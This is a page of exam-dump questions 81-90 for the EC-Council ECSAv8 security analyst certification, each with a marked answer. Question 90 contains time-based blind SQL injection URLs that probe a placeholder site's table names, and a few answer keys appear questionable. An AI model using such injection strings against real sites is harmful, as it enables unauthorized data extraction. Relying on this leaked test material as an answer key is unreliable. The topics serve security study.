[Free] 2018(Jan) EnsurePass Testking ECCouncil ECSAv8 Dumps with VCE and PDF 81-90

2018 Jan ECCouncil Official New Released ECSAv8

EC-Council Certified Security Analyst (ECSA)

Question No: 81

One of the steps in information gathering is to run searches on a company using complex keywords in Google.

Which search keywords would you use in the Google search engine to find all the PowerPoint presentations containing information about a target company, ROCHESTON?

A. ROCHESTON fileformat: ppt

B. ROCHESTON ppt:filestring

C. ROCHESTON filetype:ppt

D. ROCHESTON ppt:filesearch

Answer: C

Reference: http://blog.hubspot.com/blog/tabid/6307/bid/1264/12-Quick-Tips-To-Search-Google-Like-An-Expert.aspx (specific document types)

Question No: 82

You have compromised a lower-level administrator account on an Active Directory network of a small company in Dallas, Texas. You discover Domain Controllers through enumeration. You connect to one of the Domain Controllers on port 389 using ldp.exe.

What are you trying to accomplish here?

A. Poison the DNS records with false records

B. Enumerate MX and A records from DNS

C. Establish a remote connection to the Domain Controller

D. Enumerate domain user accounts and built-in groups

Answer: D

Question No: 83

Hackers today have an ever-increasing list of weaknesses in the web application structure at their disposal, which they can exploit to accomplish a wide variety of malicious tasks.

New flaws in web application security measures are constantly being researched, both by hackers and by security professionals. Most of these flaws affect all dynamic web applications whilst others are dependent on specific application technologies. In both cases, one may observe how the evolution and refinement of web technologies also brings about new exploits which compromise sensitive databases, provide access to theoretically secure networks, and pose a threat to the daily operation of online businesses.

What is the biggest threat to Web 2.0 technologies?

A. SQL Injection Attacks

B. Service Level Configuration Attacks

C. Inside Attacks

D. URL Tampering Attacks

Answer: A

Question No: 84

Which type of vulnerability assessment tool provides security to the IT system by testing for vulnerabilities in the applications and operating system?

A. Active/Passive Tools

B. Application-layer Vulnerability Assessment Tools

C. Location/Data Examined Tools

D. Scope Assessment Tools

Answer: D

Reference: http://books.google.com.pk/books?id=7dwEAAAAQBAJ&pg=SA7-PA11

Question No: 85

Wireless communication allows networks to extend to places that might otherwise go untouched by the wired networks. When most people say ‘Wireless’ these days, they are referring to one of the 802.11 standards. There are three main 802.11 standards: B, A, and G. Which one of the following 802.11 types uses DSSS modulation, splitting the 2.4 GHz band into channels?

A. 802.11b

B. 802.11g

C. 802.11-Legacy

D. 802.11n

Answer: A

Question No: 86

Which of the following equipment could a pen tester use to perform shoulder surfing?

A. Binoculars

B. Painted ultraviolet material

C. Microphone

D. All the above

Answer: A

Reference: http://en.wikipedia.org/wiki/Shoulder_surfing_(computer_security)

Question No: 87

Which of the following methods is used to perform server discovery?

A. Banner Grabbing

B. Whois Lookup

C. SQL Injection

D. Session Hijacking

Answer: B

Reference: http://luizfirmino.blogspot.com/2011/09/server-discovery.html

Question No: 88

Which of the following is NOT related to the Internal Security Assessment penetration testing strategy?

A. Testing to provide a more complete view of site security

B. Testing focused on the servers, infrastructure, and the underlying software, including the target

C. Testing including tiers and DMZs within the environment, the corporate network, or partner company connections

D. Testing performed from a number of network access points representing each logical and physical segment

Answer: B

Question No: 89

Today, most organizations would agree that their most valuable IT assets reside within applications and databases. Most would probably also agree that these are areas that have the weakest levels of security, thus making them the prime target for malicious activity from system administrators, DBAs, contractors, consultants, partners, and customers.

Which of the following flaws refers to an application using poorly written encryption code to securely encrypt and store sensitive data in the database and allows an attacker to steal or modify weakly protected data such as credit card numbers, SSNs, and other authentication credentials?

A. SSI injection attack

B. Insecure cryptographic storage attack

C. Hidden field manipulation attack

D. Man-in-the-Middle attack

Answer: B

Question No: 90

A pen tester has extracted a database name by using a blind SQL injection. Now he begins to test the table inside the database using the below query and finds the table:

http://juggyboy.com/page.aspx?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype='U')=3) WAITFOR DELAY '00:00:10'--

http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),1,1)))=101) WAITFOR DELAY '00:00:10'--

http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),2,1)))=109) WAITFOR DELAY '00:00:10'--

http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),3,1)))=112) WAITFOR DELAY '00:00:10'--

What is the table name?

A. CTS

B. QRT

C. EMP

D. ABC

Answer: C
